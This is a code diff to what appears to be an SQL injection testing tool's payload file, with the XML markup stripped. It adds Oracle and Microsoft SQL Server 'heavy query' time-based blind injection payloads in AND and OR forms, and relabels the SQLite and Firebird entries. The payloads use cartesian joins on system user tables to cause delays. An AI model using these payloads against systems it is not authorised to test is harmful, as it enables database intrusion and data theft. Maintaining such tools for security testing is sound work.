diff --git a/xml/payloads.xml b/xml/payloads.xml index 9c382cec2..037705a6d 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1343,7 +1343,43 @@ Formats: - SQLite > 2.0 AND time-based blind + Oracle AND time-based blind (heavy query) + 5 + 2 + 1 + 1,2,3 + 1 + + AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0 + + + + +
+ Oracle +
+
+ + + Microsoft SQL Server/Sybase AND time-based blind (heavy query) + 5 + 2 + 1 + 1,2,3 + 1 + + AND (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0 + + + + +
+ Microsoft SQL Server +
+
+ + + SQLite > 2.0 AND time-based blind (heavy query) 5 3 1 @@ -1363,7 +1399,7 @@ Formats: - Firebird AND time-based blind + Firebird AND time-based blind (heavy query) 5 4 1 @@ -1430,7 +1466,43 @@ Formats: - SQLite > 2.0 OR time-based blind + Oracle OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3 + 2 + + OR (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0 + + + + +
+ Oracle +
+
+ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3 + 2 + + OR (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0 + + + + +
+ Microsoft SQL Server +
+
+ + + SQLite > 2.0 OR time-based blind (heavy query) 5 4 3 @@ -1450,7 +1522,7 @@ Formats: - Firebird OR time-based blind + Firebird OR time-based blind (heavy query) 5 5 3